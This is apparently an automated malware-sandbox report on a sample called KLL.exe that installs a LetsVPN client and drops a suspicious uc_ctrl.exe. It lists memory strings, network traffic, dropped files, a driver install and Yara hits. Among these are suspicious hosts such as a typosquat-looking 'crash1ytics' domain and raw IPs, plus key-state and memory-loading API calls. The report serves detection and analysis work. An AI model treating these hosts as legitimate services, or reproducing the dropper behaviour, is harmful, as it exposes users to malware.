Source: powershell.exe, 0000001E.00000002.2565154970.00000000046F6000.00000004.00000800.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4042371730.00000000039AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2342018665.00007FF798323000.00000004.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2327236753.00007FF797ED4000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://subca.ocsp-certum.com01
Source: KLL.exe, 00000000.00000003.2268294121.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2268188109.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: KLL.exe, 00000000.00000003.2268294121.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2268188109.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: KLL.exe, 00000000.00000003.2268294121.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2268188109.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: http://wpfanimatedgif.codeplex.com
Source: LetsPRO.exe, 0000003C.00000002.4042371730.00000000037FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2342018665.00007FF798323000.00000004.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2327236753.00007FF797ED4000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.certum.pl/CPS0
Source: LetsPRO.exe, 0000003C.00000002.4097109567.0000000035C42000.00000002.00000001.01000000.00000033.sdmp	String found in binary or memory: http://www.hardcodet.net/taskbar
Source: KLL.exe, 00000000.00000003.2268294121.00000208768E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.isimba.cn0
Source: KLL.exe, 00000000.00000003.2268294121.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2268188109.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: KLL.exe, 00000000.00000003.2268294121.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2268188109.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: LetsPRO.exe, 0000003C.00000002.4070374175.000000000FE80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://0.0.0.0%2F0
Source: LetsPRO.exe, 0000003C.00000002.4070374175.000000000FE80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://0.0.0.0%2F0l
Source: LetsPRO.exe, 0000003C.00000002.4070374175.000000000FE80000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4071745471.000000001003A000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4065780318.000000000FC22000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4069200918.000000000FD9E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://USUS2.CERTIFICATE
Source: LetsPRO.exe, 0000003C.00000002.4065780318.000000000FC22000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://WSARecv0.0.0.0%2F0Author
Source: powershell.exe, 00000017.00000002.2334908469.00000000051B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2334908469.00000000051A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2565154970.00000000045A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: LetsPRO.exe, 0000003C.00000002.4063520256.00000000068A2000.00000002.00000001.01000000.0000001F.sdmp	String found in binary or memory: https://aka.ms/toolkit/dotnet
Source: LetsPRO.exe, 0000003C.00000002.4055027861.00000000048D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: LetsPRO.exe, 0000003C.00000002.4055027861.00000000048D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: LetsPRO.exe, 0000003C.00000002.4055027861.00000000048D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: KLL.exe, 00000000.00000003.2268294121.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2268188109.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: KLL.exe, 00000000.00000003.2268294121.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2268188109.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: LetsPRO.exe, 0000003C.00000002.4065780318.000000000FC22000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://d1dmgcawtbm6l9.cloudfront.net/rest-api
Source: LetsPRO.exe, 0000003C.00000002.4065780318.000000000FC22000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://d1dmgcawtbm6l9.cloudfront.net/rest-apiedns_client_subnet=0.0.0.0%2F0&name=d1dmgcawtbm6l9.clo
Source: LetsPRO.exe, 0000003C.00000002.4151476576.0000000068E49000.00000002.00000001.01000000.00000025.sdmp	String found in binary or memory: https://d1dmgcawtbm6l9.cloudfront.net/rest-apiinvalid
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://d3jb1hiazbhf2r.cloudfront.net/letsvpn-world/en/articles/3401886-special-settings-for-smartby
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://d3jb1hiazbhf2r.cloudfront.net/letsvpn-world/en/articles/8262720-special-settings-for-host-ne
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://d3jb1hiazbhf2r.cloudfront.net/letsvpn-world/en/articles/8262786-special-settings-for-express
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://d3jb1hiazbhf2r.cloudfront.net/letsvpn-world/en/articles/8262801-special-settings-for-killer-
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://d3jb1hiazbhf2r.cloudfront.net/letsvpn-world/en/articles/8263068-how-to-delete-hosts-in-windo
Source: svchost.exe, 0000000D.00000003.2263667963.0000018F9945E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000D.00000003.2263667963.0000018F99400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: LetsPRO.exe, 0000003C.00000002.4063520256.00000000068A2000.00000002.00000001.01000000.0000001F.sdmp	String found in binary or memory: https://github.com/CommunityToolkit/dotnet
Source: LetsPRO.exe, 0000003C.00000002.4042371730.00000000037FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: LetsPRO.exe, 0000003C.00000002.4064210674.0000000006FD2000.00000002.00000001.01000000.00000021.sdmp	String found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e3958
Source: LetsPRO.exe, 0000003C.00000002.4064210674.0000000006FD2000.00000002.00000001.01000000.00000021.sdmp	String found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e39588
Source: LetsPRO.exe, 0000003C.00000002.4064077398.0000000006956000.00000002.00000001.01000000.00000023.sdmp	String found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f8
Source: LetsPRO.exe, 0000003C.00000002.4074066016.0000000030482000.00000002.00000001.01000000.00000028.sdmp	String found in binary or memory: https://in.appcenter.ms
Source: LetsPRO.exe, 0000003C.00000002.4074066016.0000000030482000.00000002.00000001.01000000.00000028.sdmp	String found in binary or memory: https://in.appcenter.ms./logs?api-version=1.0.0
Source: LetsPRO.exe, 0000003C.00000002.4042371730.0000000003830000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://in.appcenter.ms/logs?api-version=1.0.0
Source: letsvpn-latest.exe, 00000015.00000002.2675464551.00000000007DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://intercom.help/letsvpn-world/-N
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2780068-%E5%A6%82%E4%BD%95%E4%B8%8B%E8%BD%BD%E5%BE%9
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2830420-special-settings-for-killer-networking-produ
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2907649-%E9%80%9A%E8%BF%87%E7%94%B3%E8%BF%B0%E6%89%B
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2925752-how-to-download-letsvpn
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2926044-what-if-i-reached-maximum-connection-limit
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2926062-recover-my-letsvpn-account
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3081101-adjust-the-settings-for-ipv6
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3710603-about-logging-in-out-anomalies
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://intercom.help/letsvpn-world/en/collections/1611781-%E4%B8%AD%E6%96%87%E5%B8%AE%E5%8A%A9
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp, LetsPRO.exe, 0000003C.00000002.4042371730.0000000003521000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://intercom.help/letsvpn-world/en/collections/1628560-help-documents
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://intercom.help/letsvpn-world/en/collections/Killer
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://letsvpn.world/privacy.html
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://letsvpn.world/registerterm.html
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://letsvpn.world/terms.html
Source: LetsPRO.exe, 0000003C.00000002.4065780318.000000000FC22000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nit.crash1ytics.com
Source: LetsPRO.exe, 0000003C.00000002.4068679879.000000000FD56000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4065780318.000000000FC22000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nit.crash1ytics.com/app32/device
Source: LetsPRO.exe, 0000003C.00000002.4066763632.000000000FC86000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nit.crash1ytics.com/app32/devicehttps://nit.crash1ytics.com/app32/device
Source: LetsPRO.exe, 0000003C.00000002.4067756998.000000000FCBE000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4065780318.000000000FC22000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nit.crash1ytics.comb420e29fdb1b6d67b3b951525211a4d6https://nit.crash1ytics.com
Source: powershell.exe, 0000001E.00000002.2571050198.000000000560D000.00000004.00000800.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4055027861.00000000048D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://pngimg.com/uploads/light/light_PNG14440.png
Source: LetsPRO.exe, 0000003C.00000002.4071745471.000000001003A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://postPost142.242.204.31
Source: LetsPRO.exe, 0000003C.00000002.4069200918.000000000FD9E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://postPost67.137.174.254
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://rdrt.jkjtdfbs.com/letsvpn-world/en/articles/8262690-special-settings-for-intel-connectivity-
Source: KLL.exe, 00000000.00000003.2316468558.00000208768EB000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2274005207.00000208768E9000.00000004.00000020.00020000.00000000.sdmp, KLL.exe, 00000000.00000003.2273958107.00000208788D1000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4061520880.000000000635A000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003C.00000002.4020924812.00000000015F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://widget.intercom.io/widget/
Source: KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp, KLL.exe, 00000000.00000002.2342018665.00007FF798323000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.certum.pl/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe

Code function: 19_2_6CB09FA0 ?GetClipboardData@COleObject@UiLib@@UAGJKPAPAUIDataObject@@@Z,MessageBoxA,

19_2_6CB09FA0

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe

Code function: 19_2_6CB36945 GetPropW,GlobalLock,SendMessageW,GlobalUnlock,RemovePropW,GlobalFree,GlobalUnlock,GetAsyncKeyState,SendMessageW,

19_2_6CB36945

Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS

Source: LetsPRO.exe, 0000003C.00000002.4151476576.0000000068E49000.00000002.00000001.01000000.00000025.sdmp

Binary or memory string: is unavailable()<>@,;:\"/[]?=,M3.2.0,M11.1.0-------------- 0601021504Z0700114.114.114.114126.255.255.254169.254.255.255191.255.255.254223.255.255.254255.255.255.248476837158203125: cannot parse : no frame (sp=; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAccount-ExpiredAccount-TimeoutAddDllDirectoryAddMandatoryAceAreFileApisANSIBP_BUFFERFORMATBackupEventLogWCLSIDFromStringCOLORADJUSTMENTCOMPOSITIONFORMCRYPTOAPI_BLOB_CRYPT_ATTRIBUTECRYPT_ATTR_BLOBCRYPT_DATA_BLOBCRYPT_HASH_BLOBCallWindowProcWClientAuthType(CoInitializeWOWColorAdjustLumaCompareFileTimeControl_RunDLLWCreateDataCacheCreateErrorInfoCreateHardLinkWCreateMailslotWCreateMetaFileWCreatePopupMenuCreateToolbarExCreateWindowExWCryptCreateHashCryptDestroyKeyCryptGetUserKeyCryptMemReallocCryptMsgControlDAD_DragEnterExDESKTOPENUMPROCDdeGetLastErrorDdeQueryStringWDdeUnaccessDataDdeUninitializeDefRawInputProcDefSubclassProcDeleteIPAddressDestinationAddrDeviceIoControlDialogBoxParamWDlgDirSelectExWDnsPolicyConfigDownload-FailedDragAcceptFilesDrawMenuBarTempDrawStatusTextWDrawThemeTextExDuplicateHandleECDSAP256SHA256ECDSAP384SHA384ENG_TIME_FIELDSENUMLOGFONTEXDVENUMRESLANGPROCEXPLICIT_ACCESSEmptyWorkingSetEnableScrollBarEngCreateBitmapEngEraseSurfaceEngFindResourceEngGradientFillEnumEnhMetaFileExcludeClipRectExtCreateRegionFailed to find Failed to load FindExecutableWFindNextStreamWFindNextVolumeWFindResourceExWFindVolumeCloseFlush dns cacheFlushIpNetTableFlushViewOfFileFreeAddrInfoExWGENERIC_MAPPINGGateway TimeoutGdiGradientFillGdiIsMetaFileDCGetActiveWindowGetAdapterIndexGetAdaptersInfoGetArcDirectionGetCharWidth32WGetClassInfoExWGetComboBoxInfoGetCommTimeoutsGetCommandLineWGetDCBrushColorGetDateFormatExGetDlgItemTextWGetEnhMetaFileWGetGraphicsModeGetGuiResourcesGetIpStatisticsGetKeyNameTextWGetKeyboardTypeGetLocaleInfoExGetMailslotInfoGetMenuItemRectGetMonitorInfoWGetNearestColorGetPolyFillModeGetProcessHeapsGetProcessTimesGetRawInputDataGetSecurityInfoGetStartupInfoWGetTapePositionGetTextMetricsWGetThemeIntListGetThemeMarginsGetThemeSysBoolGetThemeSysFontGetThemeSysSizeGetThreadLocaleGetTimeFormatExGetTitleBarInfoGetTrusteeFormWGetTrusteeNameWGetTrusteeTypeWGetWindowRgnBoxGlobalFindAtomWHanifi_RohingyaHasIPPacketInfoHost-Block-ListHost-Local-ListICreateTypeLib2IMEMENUITEMINFOIO_STATUS_BLOCKIP-Country-ListIP-Queue-LengthIP_ADAPTER_INFOIPersistStorageIShellItemArrayI_CryptAllocTlsI_RpcFreeBufferIcmp6CreateFileIcmpCloseHandleIcmpSendEcho2ExIdempotency-KeyImageList_MergeImageList_WriteImmIsUIMessageWImpersonateSelfInSendMessageExInitMUILanguageInsertMenuItemWIsBadStringPtrWIsHungAppWindowIsValidCodePageIsWindowEnabledIsWindowUnicodeIsWindowVisibleIsWow64Process2K32GetWsChangesKillSystemTimerLPCONDITIONPROCLPENUMFORMATETCLPFNDFMCALLBACKLPLOGCOLORSPACELPMESSAGEFILTERLPOLECLIENTSITELPPAGEPAINTHOOKLPPAGESETUPHOOKLPPRINTHOOKPROCLPSETUPHOOKPROCLPSHQUERYRBINFOLPWSAOVERLAPPEDLWBTBVCITWI2025Length RequiredLoadLibraryExA

memstr_0aa7068d-4

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CB42C80 MessageBeep,SendMessageW,SendMessageW,SendMessageW,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,		19_2_6CB42C80
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CB299B8 GetKeyState,GetKeyState,GetKeyState,SendMessageW,		19_2_6CB299B8

Source: Yara match	File source: 60.2.LetsPRO.exe.68950000.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\letsvpn\app-3.7.0\libwin.dll, type: DROPPED

Source: C:\ProgramData\letsvpn-latest.exe	File created: C:\Program Files (x86)\letsvpn\driver\tap0901.cat	Jump to dropped file
Source: C:\Windows\System32\drvinst.exe	File created: C:\Windows\System32\DriverStore\Temp\{5b26b4ea-b6dc-c74d-9d3f-4a81e79191a8}\SETC53A.tmp	Jump to dropped file
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	File created: C:\Users\user\AppData\Local\Temp\{d5789730-0a86-5a48-af99-19a03327caf5}\tap0901.cat (copy)	Jump to dropped file
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	File created: C:\Users\user\AppData\Local\Temp\{d5789730-0a86-5a48-af99-19a03327caf5}\SETC402.tmp	Jump to dropped file
Source: C:\Windows\System32\drvinst.exe	File created: C:\Windows\System32\DriverStore\Temp\{5b26b4ea-b6dc-c74d-9d3f-4a81e79191a8}\tap0901.cat (copy)	Jump to dropped file

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe

Code function: 19_2_6CB00090 NtAllocateVirtualMemory,NtAllocateVirtualMemory,LdrLoadDll,

19_2_6CB00090

Source: C:\ProgramData\letsvpn-latest.exe

File created: C:\Program Files (x86)\letsvpn\driver\tap0901.sys

Source: C:\Windows\System32\drvinst.exe

File created: C:\Windows\System32\DriverStore\Temp\{5b26b4ea-b6dc-c74d-9d3f-4a81e79191a8}

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	Jump to behavior
Source: C:\Windows\System32\drvinst.exe	File created: C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_662fd96dfdced4ae
Source: C:\Windows\System32\drvinst.exe	File created: C:\Windows\System32\DriverStore\drvstore.tmp
Source: C:\Windows\System32\drvinst.exe	File created: C:\Windows\inf\oem4.inf
Source: C:\Windows\System32\drvinst.exe	File created: C:\Windows\System32\drivers\SETCB25.tmp
Source: C:\Windows\System32\drvinst.exe	File created: C:\Windows\System32\drivers\SETCB25.tmp

Source: C:\Windows\System32\drvinst.exe

File deleted: C:\Windows\System32\DriverStore\Temp\{5b26b4ea-b6dc-c74d-9d3f-4a81e79191a8}\SETC52A.tmp

Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_00000001800060F0	0_2_00000001800060F0
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_0000000180017B6C	0_2_0000000180017B6C
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_0000000180023430	0_2_0000000180023430
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_00000001800044D4	0_2_00000001800044D4
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_00000001800075B4	0_2_00000001800075B4
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_000000018000A068	0_2_000000018000A068
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_000000018001F0F4	0_2_000000018001F0F4
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_000000018002A914	0_2_000000018002A914
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_0000000180027938	0_2_0000000180027938
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_0000000180019A4C	0_2_0000000180019A4C
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_000000018001A25C	0_2_000000018001A25C
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_0000000180004358	0_2_0000000180004358
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_0000000180026368	0_2_0000000180026368
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_000000018001D418	0_2_000000018001D418
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_0000000180019570	0_2_0000000180019570
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_000000018002CDB0	0_2_000000018002CDB0
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_0000000180017EAC	0_2_0000000180017EAC
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_00000001800296F4	0_2_00000001800296F4
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_0000000180026790	0_2_0000000180026790
Source: C:\Users\user\Desktop\KLL.exe	Code function: 0_2_000000018000B7E0	0_2_000000018000B7E0
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_00C61870	19_2_00C61870
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CB00090	19_2_6CB00090
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CB82D52	19_2_6CB82D52
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CC54943	19_2_6CC54943
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CC58203	19_2_6CC58203
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CB49F03	19_2_6CB49F03
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CDCEA18	19_2_6CDCEA18
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CDC1EF4	19_2_6CDC1EF4
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CDF9850	19_2_6CDF9850
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CDC1AE7	19_2_6CDC1AE7
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CDC5620	19_2_6CDC5620

Source: Joe Sandbox View

Dropped File: C:\Program Files (x86)\letsvpn\Update.exe 677C41FDBD8E90CCCB5AD0CA4C9313AAA96337405365E3DD39313EF9B99A93AC

Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe

Process token adjusted: Load Driver

Source: C:\Windows\System32\svchost.exe

Process token adjusted: Security

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: String function: 6CDFB723 appears 72 times
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: String function: 6CC51B7F appears 36 times
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: String function: 6CB19160 appears 3082 times
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: String function: 6CC514D2 appears 41 times
